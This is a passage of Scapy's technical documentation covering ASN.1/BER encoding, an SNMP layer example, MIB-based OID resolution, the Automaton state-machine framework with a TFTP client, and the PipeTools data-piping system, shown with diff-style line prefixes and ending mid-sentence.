-^^^^^^^^^^^^^^^^^ - -As with the standard, ASN.1 and encoding are independent. We have just seen how to create a compounded ASN.1 object. To encode or decode it, we need to choose an encoding rule. Scapy provides only BER for the moment (actually, it may be DER. DER looks like BER except only minimal encoding is authorised which may well be what I did). I call this an ASN.1 codec. - -Encoding and decoding are done using class methods provided by the codec. For example the ``BERcodec_INTEGER`` class provides a ``.enc()`` and a ``.dec()`` class methods that can convert between an encoded string and a value of their type. They all inherit from BERcodec_Object which is able to decode objects from any type:: - - >>> BERcodec_INTEGER.enc(7) - '\x02\x01\x07' - >>> BERcodec_BIT_STRING.enc("egg") - '\x03\x03egg' - >>> BERcodec_STRING.enc("egg") - '\x04\x03egg' - >>> BERcodec_STRING.dec('\x04\x03egg') - (, '') - >>> BERcodec_STRING.dec('\x03\x03egg') - Traceback (most recent call last): - File "", line 1, in ? - File "/usr/bin/scapy", line 2099, in dec - return cls.do_dec(s, context, safe) - File "/usr/bin/scapy", line 2178, in do_dec - l,s,t = cls.check_type_check_len(s) - File "/usr/bin/scapy", line 2076, in check_type_check_len - l,s3 = cls.check_type_get_len(s) - File "/usr/bin/scapy", line 2069, in check_type_get_len - s2 = cls.check_type(s) - File "/usr/bin/scapy", line 2065, in check_type - (cls.__name__, ord(s[0]), ord(s[0]),cls.tag), remaining=s) - BER_BadTag_Decoding_Error: BERcodec_STRING: Got tag [3/0x3] while expecting - ### Already decoded ### - None - ### Remaining ### - '\x03\x03egg' - >>> BERcodec_Object.dec('\x03\x03egg') - (, '') - -ASN.1 objects are encoded using their ``.enc()`` method. This method must be called with the codec we want to use. All codecs are referenced in the ASN1_Codecs object. ``raw()`` can also be used. In this case, the default codec (``conf.ASN1_default_codec``) will be used. - -:: - - >>> x.enc(ASN1_Codecs.BER) - '0\r\x02\x01\x07\x04\x03egg0\x03\x01\x01\x00' - >>> raw(x) - '0\r\x02\x01\x07\x04\x03egg0\x03\x01\x01\x00' - >>> xx,remain = BERcodec_Object.dec(_) - >>> xx.show() - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - - - >>> remain - '' - -By default, decoding is done using the ``Universal`` class, which means objects defined in the ``Context`` class will not be decoded. There is a good reason for that: the decoding depends on the context! - -:: - - >>> cert=""" - ... MIIF5jCCA86gAwIBAgIBATANBgkqhkiG9w0BAQUFADCBgzELMAkGA1UEBhMC - ... VVMxHTAbBgNVBAoTFEFPTCBUaW1lIFdhcm5lciBJbmMuMRwwGgYDVQQLExNB - ... bWVyaWNhIE9ubGluZSBJbmMuMTcwNQYDVQQDEy5BT0wgVGltZSBXYXJuZXIg - ... Um9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAyMB4XDTAyMDUyOTA2MDAw - ... MFoXDTM3MDkyODIzNDMwMFowgYMxCzAJBgNVBAYTAlVTMR0wGwYDVQQKExRB - ... T0wgVGltZSBXYXJuZXIgSW5jLjEcMBoGA1UECxMTQW1lcmljYSBPbmxpbmUg - ... SW5jLjE3MDUGA1UEAxMuQU9MIFRpbWUgV2FybmVyIFJvb3QgQ2VydGlmaWNh - ... dGlvbiBBdXRob3JpdHkgMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC - ... ggIBALQ3WggWmRToVbEbJGv8x4vmh6mJ7ouZzU9AhqS2TcnZsdw8TQ2FTBVs - ... RotSeJ/4I/1n9SQ6aF3Q92RhQVSji6UI0ilbm2BPJoPRYxJWSXakFsKlnUWs - ... i4SVqBax7J/qJBrvuVdcmiQhLE0OcR+mrF1FdAOYxFSMFkpBd4aVdQxHAWZg - ... /BXxD+r1FHjHDtdugRxev17nOirYlxcwfACtCJ0zr7iZYYCLqJV+FNwSbKTQ - ... 2O9ASQI2+W6p1h2WVgSysy0WVoaP2SBXgM1nEG2wTPDaRrbqJS5Gr42whTg0 - ... ixQmgiusrpkLjhTXUr2eacOGAgvqdnUxCc4zGSGFQ+aJLZ8lN2fxI2rSAG2X - ... +Z/nKcrdH9cG6rjJuQkhn8g/BsXS6RJGAE57COtCPStIbp1n3UsC5ETzkxml - ... J85per5n0/xQpCyrw2u544BMzwVhSyvcG7mm0tCq9Stz+86QNZ8MUhy/XCFh - ... EVsVS6kkUfykXPcXnbDS+gfpj1bkGoxoigTTfFrjnqKhynFbotSg5ymFXQNo - ... Kk/SBtc9+cMDLz9l+WceR0DTYw/j1Y75hauXTLPXJuuWCpTehTacyH+BCQJJ - ... Kg71ZDIMgtG6aoIbs0t0EfOMd9afv9w3pKdVBC/UMejTRrkDfNoSTllkt1Ex - ... MVCgyhwn2RAurda9EGYrw7AiShJbAgMBAAGjYzBhMA8GA1UdEwEB/wQFMAMB - ... Af8wHQYDVR0OBBYEFE9pbQN+nZ8HGEO8txBO1b+pxCAoMB8GA1UdIwQYMBaA - ... FE9pbQN+nZ8HGEO8txBO1b+pxCAoMA4GA1UdDwEB/wQEAwIBhjANBgkqhkiG - ... 9w0BAQUFAAOCAgEAO/Ouyuguh4X7ZVnnrREUpVe8WJ8kEle7+z802u6teio0 - ... cnAxa8cZmIDJgt43d15Ui47y6mdPyXSEkVYJ1eV6moG2gcKtNuTxVBFT8zRF - ... ASbI5Rq8NEQh3q0l/HYWdyGQgJhXnU7q7C+qPBR7V8F+GBRn7iTGvboVsNIY - ... vbdVgaxTwOjdaRITQrcCtQVBynlQboIOcXKTRuidDV29rs4prWPVVRaAMCf/ - ... drr3uNZK49m1+VLQTkCpx+XCMseqdiThawVQ68W/ClTluUI8JPu3B5wwn3la - ... 5uBAUhX0/Kr0VvlEl4ftDmVyXr4m+02kLQgH3thcoNyBM5kYJRF3p+v9WAks - ... mWsbivNSPxpNSGDxoPYzAlOL7SUJuA0t7Zdz7NeWH45gDtoQmy8YJPamTQr5 - ... O8t1wswvziRpyQoijlmn94IM19drNZxDAGrElWe6nEXLuA4399xOAU++CrYD - ... 062KRffaJ00psUjf5BHklka9bAI+1lHIlRcBFanyqqryvy9lG2/QuRqT9Y41 - ... xICHPpQvZuTpqP9BnHAqTyo5GJUefvthATxRCC4oGKQWDzH9OmwjkyB24f0H - ... hdFbP9IcczLd+rn4jM8Ch3qaluTtT4mNU0OrDhPAARW0eTjb/G49nlG2uBOL - ... Z8/5fNkiHfZdxRwBL5joeiQYvITX+txyW/fBOmg= - ... """.decode("base64") - >>> (dcert,remain) = BERcodec_Object.dec(cert) - Traceback (most recent call last): - File "", line 1, in ? - File "/usr/bin/scapy", line 2099, in dec - return cls.do_dec(s, context, safe) - File "/usr/bin/scapy", line 2094, in do_dec - return codec.dec(s,context,safe) - File "/usr/bin/scapy", line 2099, in dec - return cls.do_dec(s, context, safe) - File "/usr/bin/scapy", line 2218, in do_dec - o,s = BERcodec_Object.dec(s, context, safe) - File "/usr/bin/scapy", line 2099, in dec - return cls.do_dec(s, context, safe) - File "/usr/bin/scapy", line 2094, in do_dec - return codec.dec(s,context,safe) - File "/usr/bin/scapy", line 2099, in dec - return cls.do_dec(s, context, safe) - File "/usr/bin/scapy", line 2218, in do_dec - o,s = BERcodec_Object.dec(s, context, safe) - File "/usr/bin/scapy", line 2099, in dec - return cls.do_dec(s, context, safe) - File "/usr/bin/scapy", line 2092, in do_dec - raise BER_Decoding_Error("Unknown prefix [%02x] for [%r]" % (p,t), remaining=s) - BER_Decoding_Error: Unknown prefix [a0] for ['\xa0\x03\x02\x01\x02\x02\x01\x010\r\x06\t*\x86H...'] - ### Already decoded ### - [[]] - ### Remaining ### - '\xa0\x03\x02\x01\x02\x02\x01\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\x831\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x1d0\x1b\x06\x03U\x04\n\x13\x14AOL Time Warner Inc.1\x1c0\x1a\x06\x03U\x04\x0b\x13\x13America Online Inc.1705\x06\x03U\x04\x03\x13.AOL Time Warner Root Certification Authority 20\x1e\x17\r020529060000Z\x17\r370928234300Z0\x81\x831\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x1d0\x1b\x06\x03U\x04\n\x13\x14AOL Time Warner Inc.1\x1c0\x1a\x06\x03U\x04\x0b\x13\x13America Online Inc.1705\x06\x03U\x04\x03\x13.AOL Time Warner Root Certification Authority 20\x82\x02"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x02\x0f\x000\x82\x02\n\x02\x82\x02\x01\x00\xb47Z\x08\x16\x99\x14\xe8U\xb1\x1b$k\xfc\xc7\x8b\xe6\x87\xa9\x89\xee\x8b\x99\xcdO@\x86\xa4\xb6M\xc9\xd9\xb1\xdc\xd6Q\xc8\x95\x17\x01\x15\xa9\xf2\xaa\xaa\xf2\xbf/e\x1bo\xd0\xb9\x1a\x93\xf5\x8e5\xc4\x80\x87>\x94/f\xe4\xe9\xa8\xffA\x9cp*O*9\x18\x95\x1e~\xfba\x01>> (dcert,remain) = BERcodec_Object.dec(cert, context=ASN1_Class_X509) - >>> dcert.show() - # ASN1_SEQUENCE: - # ASN1_SEQUENCE: - # ASN1_X509_CONT0: - - - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SET: - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - # ASN1_SEQUENCE: - - - - # ASN1_X509_CONT3: - # ASN1_SEQUENCE: - # ASN1_SEQUENCE: - - - - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - - - - # ASN1_SEQUENCE: - - - \xd6Q\xc8\x95\x17\x01\x15\xa9\xf2\xaa\xaa\xf2\xbf/e\x1bo\xd0\xb9\x1a\x93\xf5\x8e5\xc4\x80\x87>\x94/f\xe4\xe9\xa8\xffA\x9cp*O*9\x18\x95\x1e~\xfba\x01 - -ASN.1 layers -^^^^^^^^^^^^ - -While this may be nice, it's only an ASN.1 encoder/decoder. Nothing related to Scapy yet. - -ASN.1 fields -~~~~~~~~~~~~ - -Scapy provides ASN.1 fields. They will wrap ASN.1 objects and provide the necessary logic to bind a field name to the value. ASN.1 packets will be described as a tree of ASN.1 fields. Then each field name will be made available as a normal ``Packet`` object, in a flat flavor (ex: to access the version field of a SNMP packet, you don't need to know how many containers wrap it). - -Each ASN.1 field is linked to an ASN.1 object through its tag. - - -ASN.1 packets -~~~~~~~~~~~~~ - -ASN.1 packets inherit from the Packet class. Instead of a ``fields_desc`` list of fields, they define ``ASN1_codec`` and ``ASN1_root`` attributes. The first one is a codec (for example: ``ASN1_Codecs.BER``), the second one is a tree compounded with ASN.1 fields. - -A complete example: SNMP ------------------------- - -SNMP defines new ASN.1 objects. We need to define them:: - - class ASN1_Class_SNMP(ASN1_Class_UNIVERSAL): - name="SNMP" - PDU_GET = 0xa0 - PDU_NEXT = 0xa1 - PDU_RESPONSE = 0xa2 - PDU_SET = 0xa3 - PDU_TRAPv1 = 0xa4 - PDU_BULK = 0xa5 - PDU_INFORM = 0xa6 - PDU_TRAPv2 = 0xa7 - -These objects are PDU, and are in fact new names for a sequence container (this is generally the case for context objects: they are old containers with new names). This means creating the corresponding ASN.1 objects and BER codecs is simplistic:: - - class ASN1_SNMP_PDU_GET(ASN1_SEQUENCE): - tag = ASN1_Class_SNMP.PDU_GET - - class ASN1_SNMP_PDU_NEXT(ASN1_SEQUENCE): - tag = ASN1_Class_SNMP.PDU_NEXT - - # [...] - - class BERcodec_SNMP_PDU_GET(BERcodec_SEQUENCE): - tag = ASN1_Class_SNMP.PDU_GET - - class BERcodec_SNMP_PDU_NEXT(BERcodec_SEQUENCE): - tag = ASN1_Class_SNMP.PDU_NEXT - - # [...] - -Metaclasses provide the magic behind the fact that everything is automatically registered and that ASN.1 objects and BER codecs can find each other. - -The ASN.1 fields are also trivial:: - - class ASN1F_SNMP_PDU_GET(ASN1F_SEQUENCE): - ASN1_tag = ASN1_Class_SNMP.PDU_GET - - class ASN1F_SNMP_PDU_NEXT(ASN1F_SEQUENCE): - ASN1_tag = ASN1_Class_SNMP.PDU_NEXT - - # [...] - -Now, the hard part, the ASN.1 packet:: - - SNMP_error = { 0: "no_error", - 1: "too_big", - # [...] - } - - SNMP_trap_types = { 0: "cold_start", - 1: "warm_start", - # [...] - } - - class SNMPvarbind(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( ASN1F_OID("oid","1.3"), - ASN1F_field("value",ASN1_NULL(0)) - ) - - - class SNMPget(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SNMP_PDU_GET( ASN1F_INTEGER("id",0), - ASN1F_enum_INTEGER("error",0, SNMP_error), - ASN1F_INTEGER("error_index",0), - ASN1F_SEQUENCE_OF("varbindlist", [], SNMPvarbind) - ) - - class SNMPnext(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SNMP_PDU_NEXT( ASN1F_INTEGER("id",0), - ASN1F_enum_INTEGER("error",0, SNMP_error), - ASN1F_INTEGER("error_index",0), - ASN1F_SEQUENCE_OF("varbindlist", [], SNMPvarbind) - ) - # [...] - - class SNMP(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_enum_INTEGER("version", 1, {0:"v1", 1:"v2c", 2:"v2", 3:"v3"}), - ASN1F_STRING("community","public"), - ASN1F_CHOICE("PDU", SNMPget(), - SNMPget, SNMPnext, SNMPresponse, SNMPset, - SNMPtrapv1, SNMPbulk, SNMPinform, SNMPtrapv2) - ) - def answers(self, other): - return ( isinstance(self.PDU, SNMPresponse) and - ( isinstance(other.PDU, SNMPget) or - isinstance(other.PDU, SNMPnext) or - isinstance(other.PDU, SNMPset) ) and - self.PDU.id == other.PDU.id ) - # [...] - bind_layers( UDP, SNMP, sport=161) - bind_layers( UDP, SNMP, dport=161) - -That wasn't that much difficult. If you think that can't be that short to implement SNMP encoding/decoding and that I may have cut too much, just look at the complete source code. - -Now, how to use it? As usual:: - - >>> a=SNMP(version=3, PDU=SNMPget(varbindlist=[SNMPvarbind(oid="1.2.3",value=5), - ... SNMPvarbind(oid="3.2.1",value="hello")])) - >>> a.show() - ###[ SNMP ]### - version= v3 - community= 'public' - \PDU\ - |###[ SNMPget ]### - | id= 0 - | error= no_error - | error_index= 0 - | \varbindlist\ - | |###[ SNMPvarbind ]### - | | oid= '1.2.3' - | | value= 5 - | |###[ SNMPvarbind ]### - | | oid= '3.2.1' - | | value= 'hello' - >>> hexdump(a) - 0000 30 2E 02 01 03 04 06 70 75 62 6C 69 63 A0 21 02 0......public.!. - 0010 01 00 02 01 00 02 01 00 30 16 30 07 06 02 2A 03 ........0.0...*. - 0020 02 01 05 30 0B 06 02 7A 01 04 05 68 65 6C 6C 6F ...0...z...hello - >>> send(IP(dst="1.2.3.4")/UDP()/SNMP()) - . - Sent 1 packets. - >>> SNMP(raw(a)).show() - ###[ SNMP ]### - version= - community= - \PDU\ - |###[ SNMPget ]### - | id= - | error= - | error_index= - | \varbindlist\ - | |###[ SNMPvarbind ]### - | | oid= - | | value= - | |###[ SNMPvarbind ]### - | | oid= - | | value= - - - -Resolving OID from a MIB ------------------------- - -About OID objects -^^^^^^^^^^^^^^^^^ - -OID objects are created with an ``ASN1_OID`` class:: - - >>> o1=ASN1_OID("2.5.29.10") - >>> o2=ASN1_OID("1.2.840.113549.1.1.1") - >>> o1,o2 - (, ) - -Loading a MIB -^^^^^^^^^^^^^ - -Scapy can parse MIB files and become aware of a mapping between an OID and its name:: - - >>> load_mib("mib/*") - >>> o1,o2 - (, ) - -The MIB files I've used are attached to this page. - -Scapy's MIB database -^^^^^^^^^^^^^^^^^^^^ - -All MIB information is stored into the conf.mib object. This object can be used to find the OID of a name - -:: - - >>> conf.mib.sha1_with_rsa_signature - '1.2.840.113549.1.1.5' - -or to resolve an OID:: - - >>> conf.mib._oidname("1.2.3.6.1.4.1.5") - 'enterprises.5' - -It is even possible to graph it:: - - >>> conf.mib._make_graph() - - - -Automata -======== - -Scapy enables to create easily network automata. Scapy does not stick to a specific model like Moore or Mealy automata. It provides a flexible way for you to choose your way to go. - -An automaton in Scapy is deterministic. It has different states. A start state and some end and error states. There are transitions from one state to another. Transitions can be transitions on a specific condition, transitions on the reception of a specific packet or transitions on a timeout. When a transition is taken, one or more actions can be run. An action can be bound to many transitions. Parameters can be passed from states to transitions, and from transitions to states and actions. - -From a programmer's point of view, states, transitions and actions are methods from an Automaton subclass. They are decorated to provide meta-information needed in order for the automaton to work. - -First example -------------- - -Let's begin with a simple example. I take the convention to write states with capitals, but anything valid with Python syntax would work as well. - -:: - - class HelloWorld(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - print("State=BEGIN") - - @ATMT.condition(BEGIN) - def wait_for_nothing(self): - print("Wait for nothing...") - raise self.END() - - @ATMT.action(wait_for_nothing) - def on_nothing(self): - print("Action on 'nothing' condition") - - @ATMT.state(final=1) - def END(self): - print("State=END") - -In this example, we can see 3 decorators: - -* ``ATMT.state`` that is used to indicate that a method is a state, and that can - have initial, final, stop and error optional arguments set to non-zero for special states. -* ``ATMT.condition`` that indicate a method to be run when the automaton state - reaches the indicated state. The argument is the name of the method representing that state -* ``ATMT.action`` binds a method to a transition and is run when the transition is taken. - -Running this example gives the following result:: - - >>> a=HelloWorld() - >>> a.run() - State=BEGIN - Wait for nothing... - Action on 'nothing' condition - State=END - >>> a.destroy() - -This simple automaton can be described with the following graph: - -.. image:: graphics/ATMT_HelloWorld.* - -The graph can be automatically drawn from the code with:: - - >>> HelloWorld.graph() - -.. note:: An ``Automaton`` can be reset using ``restart()``. It is then possible to run it again. - -.. warning:: Remember to call ``destroy()`` once you're done using an Automaton. (especially on PyPy) - -Changing states ---------------- - -The ``ATMT.state`` decorator transforms a method into a function that returns an exception. If you raise that exception, the automaton state will be changed. If the change occurs in a transition, actions bound to this transition will be called. The parameters given to the function replacing the method will be kept and finally delivered to the method. The exception has a method action_parameters that can be called before it is raised so that it will store parameters to be delivered to all actions bound to the current transition. - -As an example, let's consider the following state:: - - @ATMT.state() - def MY_STATE(self, param1, param2): - print("state=MY_STATE. param1=%r param2=%r" % (param1, param2)) - -This state will be reached with the following code:: - - @ATMT.receive_condition(ANOTHER_STATE) - def received_ICMP(self, pkt): - if ICMP in pkt: - raise self.MY_STATE("got icmp", pkt[ICMP].type) - -Let's suppose we want to bind an action to this transition, that will also need some parameters:: - - @ATMT.action(received_ICMP) - def on_ICMP(self, icmp_type, icmp_code): - self.retaliate(icmp_type, icmp_code) - -The condition should become:: - - @ATMT.receive_condition(ANOTHER_STATE) - def received_ICMP(self, pkt): - if ICMP in pkt: - raise self.MY_STATE("got icmp", pkt[ICMP].type).action_parameters(pkt[ICMP].type, pkt[ICMP].code) - -Real example ------------- - -Here is a real example take from Scapy. It implements a TFTP client that can issue read requests. - -.. image:: graphics/ATMT_TFTP_read.* - -:: - - class TFTP_read(Automaton): - def parse_args(self, filename, server, sport = None, port=69, **kargs): - Automaton.parse_args(self, **kargs) - self.filename = filename - self.server = server - self.port = port - self.sport = sport - - def master_filter(self, pkt): - return ( IP in pkt and pkt[IP].src == self.server and UDP in pkt - and pkt[UDP].dport == self.my_tid - and (self.server_tid is None or pkt[UDP].sport == self.server_tid) ) - - # BEGIN - @ATMT.state(initial=1) - def BEGIN(self): - self.blocksize=512 - self.my_tid = self.sport or RandShort()._fix() - bind_bottom_up(UDP, TFTP, dport=self.my_tid) - self.server_tid = None - self.res = b"" - - self.l3 = IP(dst=self.server)/UDP(sport=self.my_tid, dport=self.port)/TFTP() - self.last_packet = self.l3/TFTP_RRQ(filename=self.filename, mode="octet") - self.send(self.last_packet) - self.awaiting=1 - - raise self.WAITING() - - # WAITING - @ATMT.state() - def WAITING(self): - pass - - @ATMT.receive_condition(WAITING) - def receive_data(self, pkt): - if TFTP_DATA in pkt and pkt[TFTP_DATA].block == self.awaiting: - if self.server_tid is None: - self.server_tid = pkt[UDP].sport - self.l3[UDP].dport = self.server_tid - raise self.RECEIVING(pkt) - @ATMT.action(receive_data) - def send_ack(self): - self.last_packet = self.l3 / TFTP_ACK(block = self.awaiting) - self.send(self.last_packet) - - @ATMT.receive_condition(WAITING, prio=1) - def receive_error(self, pkt): - if TFTP_ERROR in pkt: - raise self.ERROR(pkt) - - @ATMT.timeout(WAITING, 3) - def timeout_waiting(self): - raise self.WAITING() - @ATMT.action(timeout_waiting) - def retransmit_last_packet(self): - self.send(self.last_packet) - - # RECEIVED - @ATMT.state() - def RECEIVING(self, pkt): - recvd = pkt[Raw].load - self.res += recvd - self.awaiting += 1 - if len(recvd) == self.blocksize: - raise self.WAITING() - raise self.END() - - # ERROR - @ATMT.state(error=1) - def ERROR(self,pkt): - split_bottom_up(UDP, TFTP, dport=self.my_tid) - return pkt[TFTP_ERROR].summary() - - #END - @ATMT.state(final=1) - def END(self): - split_bottom_up(UDP, TFTP, dport=self.my_tid) - return self.res - -It can be run like this, for instance:: - - >>> atmt = TFTP_read("my_file", "192.168.1.128") - >>> atmt.run() - >>> atmt.destroy() - -Detailed documentation ----------------------- - -Decorators -^^^^^^^^^^ -Decorator for states -~~~~~~~~~~~~~~~~~~~~ - -States are methods decorated by the result of the ``ATMT.state`` function. It can take 4 optional parameters, ``initial``, ``final``, ``stop`` and ``error``, that, when set to ``True``, indicating that the state is an initial, final, stop or error state. - -.. note:: The ``initial`` state is called while starting the automata. The ``final`` step will tell the automata has reached its end. If you call ``atmt.stop()``, the automata will move to the ``stop`` step whatever its current state is. The ``error`` state will mark the automata as errored. If no ``stop`` state is specified, calling ``stop`` and ``forcestop`` will be equivalent. - -:: - - class Example(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - pass - - @ATMT.state() - def SOME_STATE(self): - pass - - @ATMT.state(final=1) - def END(self): - return "Result of the automaton: 42" - - @ATMT.state(stop=1) - def STOP(self): - print("SHUTTING DOWN...") - # e.g. close sockets... - - @ATMT.condition(STOP) - def is_stopping(self): - raise self.END() - - @ATMT.state(error=1) - def ERROR(self): - return "Partial result, or explanation" - # [...] - -Take for instance the TCP client: - -.. image:: graphics/ATMT_TCP_client.svg - -The ``START`` event is ``initial=1``, the ``STOP`` event is ``stop=1`` and the ``CLOSED`` event is ``final=1``. - -Decorators for transitions -~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Transitions are methods decorated by the result of one of ``ATMT.condition``, ``ATMT.receive_condition``, ``ATMT.eof``, ``ATMT.timeout``, ``ATMT.timer``. They all take as argument the state method they are related to. ``ATMT.timeout`` and ``ATMT.timer`` also have a mandatory ``timeout`` parameter to provide the timeout value in seconds. The difference between ``ATMT.timeout`` and ``ATMT.timer`` is that ``ATMT.timeout`` gets triggered only once. ``ATMT.timer`` get reloaded automatically, which is useful for sending keep-alive packets. ``ATMT.condition`` and ``ATMT.receive_condition`` have an optional ``prio`` parameter so that the order in which conditions are evaluated can be forced. The default priority is 0. Transitions with the same priority level are called in an undetermined order. - -When the automaton switches to a given state, the state's method is executed. Then transitions methods are called at specific moments until one triggers a new state (something like ``raise self.MY_NEW_STATE()``). First, right after the state's method returns, the ``ATMT.condition`` decorated methods are run by growing prio. Then each time a packet is received and accepted by the master filter all ``ATMT.receive_condition`` decorated hods are called by growing prio. When a timeout is reached since the time we entered into the current space, the corresponding ``ATMT.timeout`` decorated method is called. If the socket raises an ``EOFError`` (closed) during a state, the ``ATMT.EOF`` transition is called. Otherwise it raises an exception and the automaton exits. - -:: - - class Example(Automaton): - @ATMT.state() - def WAITING(self): - pass - - @ATMT.condition(WAITING) - def it_is_raining(self): - if not self.have_umbrella: - raise self.ERROR_WET() - - @ATMT.receive_condition(WAITING, prio=1) - def it_is_ICMP(self, pkt): - if ICMP in pkt: - raise self.RECEIVED_ICMP(pkt) - - @ATMT.receive_condition(WAITING, prio=2) - def it_is_IP(self, pkt): - if IP in pkt: - raise self.RECEIVED_IP(pkt) - - @ATMT.timeout(WAITING, 10.0) - def waiting_timeout(self): - raise self.ERROR_TIMEOUT() - -Decorator for actions -~~~~~~~~~~~~~~~~~~~~~ - -Actions are methods that are decorated by the return of ``ATMT.action`` function. This function takes the transition method it is bound to as first parameter and an optional priority ``prio`` as a second parameter. The default priority is 0. An action method can be decorated many times to be bound to many transitions. - -:: - - from random import random - - class Example(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - pass - - @ATMT.state(final=1) - def END(self): - pass - - @ATMT.condition(BEGIN, prio=1) - def maybe_go_to_end(self): - if random() > 0.5: - raise self.END() - - @ATMT.condition(BEGIN, prio=2) - def certainly_go_to_end(self): - raise self.END() - - @ATMT.action(maybe_go_to_end) - def maybe_action(self): - print("We are lucky...") - - @ATMT.action(certainly_go_to_end) - def certainly_action(self): - print("We are not lucky...") - - @ATMT.action(maybe_go_to_end, prio=1) - @ATMT.action(certainly_go_to_end, prio=1) - def always_action(self): - print("This wasn't luck!...") - -The two possible outputs are:: - - >>> a=Example() - >>> a.run() - We are not lucky... - This wasn't luck!... - >>> a.run() - We are lucky... - This wasn't luck!... - >>> a.destroy() - - -.. note:: If you want to pass a parameter to an action, you can use the ``action_parameters`` function while raising the next state. - -In the following example, the ``send_copy`` action takes a parameter passed by ``is_fin``:: - - class Example(Automaton): - @ATMT.state() - def WAITING(self): - pass - - @ATMT.state() - def FIN_RECEIVED(self): - pass - - @ATMT.receive_condition(WAITING) - def is_fin(self, pkt): - if pkt[TCP].flags.F: - raise self.FIN_RECEIVED().action_parameters(pkt) - - @ATMT.action(is_fin) - def send_copy(self, pkt): - send(pkt) - - -Methods to overload -^^^^^^^^^^^^^^^^^^^ - -Two methods are hooks to be overloaded: - -* The ``parse_args()`` method is called with arguments given at ``__init__()`` and ``run()``. Use that to parametrize the behavior of your automaton. - -* The ``master_filter()`` method is called each time a packet is sniffed and decides if it is interesting for the automaton. When working on a specific protocol, this is where you will ensure the packet belongs to the connection you are being part of, so that you do not need to make all the sanity checks in each transition. - -Timer configuration -^^^^^^^^^^^^^^^^^^^ - -Some protocols allow timer configuration. In order to configure timeout values during class initialization one may use ``timer_by_name()`` method, which returns ``Timer`` object associated with the given function name:: - - class Example(Automaton): - def __init__(self, *args, **kwargs): - super(Example, self).__init__(*args, **kwargs) - timer = self.timer_by_name("waiting_timeout") - timer.set(1) - - @ATMT.state(initial=1) - def WAITING(self): - pass - - @ATMT.state(final=1) - def END(self): - pass - - @ATMT.timeout(WAITING, 10.0) - def waiting_timeout(self): - raise self.END() - -.. _pipetools: - -PipeTools -========= - -Scapy's ``pipetool`` is a smart piping system allowing to perform complex stream data management. - -The goal is to create a sequence of steps with one or several inputs and one or several outputs, with a bunch of blocks in between. -PipeTools can handle varied sources of data (and outputs) such as user input, pcap input, sniffing, wireshark... -A pipe system is implemented by manually linking all its parts. It is possible to dynamically add an element while running or set multiple drains for the same source. - -.. note:: Pipetool default objects are located inside ``scapy.pipetool`` - -Demo: sniff, anonymize, send to Wireshark ------------------------------------------ - -The following code will sniff packets on the default interface, anonymize the source and destination IP addresses and pipe it all into Wireshark. Useful when posting online examples, for instance. - -.. code-block:: python3 - - source = SniffSource(iface=conf.iface) - wire = WiresharkSink() - def transf(pkt): - if not pkt or IP not in pkt: - return pkt - pkt[IP].src = "1.1.1.1" - pkt[IP].dst = "2.2.2.2" - return pkt - - source > TransformDrain(transf) > wire - p = PipeEngine(source) - p.start() - p.wait_and_stop() - -The engine is pretty straightforward: - -.. image:: graphics/pipetool_demo.svg - -Let's run it: - -.. image:: graphics/animations/pipetool_demo.gif - -Class Types ------------ - -There are 3 different class of objects used for data management: - -- ``Sources`` -- ``Drains`` -- ``Sinks`` - -They are executed and handled by a :class:`~scapy.pipetool.PipeEngine` object. - -When running, a pipetool engine waits for any available data from the Source, and send it in the Drains linked to it. -The data then goes from Drains to Drains until it arrives in a Sink, the final state of this data. - -Let's see with a basic demo how to build a pipetool system. - -.. image:: graphics/pipetool_engine.png - -For instance, this engine was generated with this code: - -.. code:: pycon - - >>> s = CLIFeeder() - >>> s2 = CLIHighFeeder() - >>> d1 = Drain() - >>> d2 = TransformDrain(lambda x: x[::-1]) - >>> si1 = ConsoleSink() - >>> si2 = QueueSink() - >>> - >>> s > d1 - >>> d1 > si1 - >>> d1 > si2 - >>> - >>> s2 >> d1 - >>> d1 >> d2 - >>> d2 >> si1 - >>> - >>> p = PipeEngine() - >>> p.add(s) - >>> p.add(s2) - >>> p.graph(target="> the_above_image.png") - -``start()`` is used to start the :class:`~scapy.pipetool.PipeEngine`: - -.. code:: pycon - - >>> p.start() - -Now, let's play with it by sending some input data - -.. code:: pycon - - >>> s.send("foo") - >'foo' - >>> s2.send("bar") - >>'rab' - >>> s.send("i like potato") - >'i like potato' - >>> print(si2.recv(), ":", si2.recv()) - foo : i like potato - -Let's study what happens here: - -- there are **two canals** in a :class:`~scapy.pipetool.PipeEngine`, a lower one and a higher one. Some Sources write on the lower one, some on the higher one and some on both. -- most sources can be linked to any drain, on both lower and higher canals. The use of ``>`` indicates a link on the low canal, and ``>>`` on the higher one. -- when we send some data in ``s``, which is on the lower canal, as shown above, it goes through the :class:`~scapy.pipetool.Drain` then is sent to the :class:`~.scapy.pipetool.QueueSink` and to the :class:`~scapy.pipetool.ConsoleSink` -- when we send some data in ``s2``, it goes through the Drain, then the TransformDrain where the data is reversed (see the lambda), before being sent to 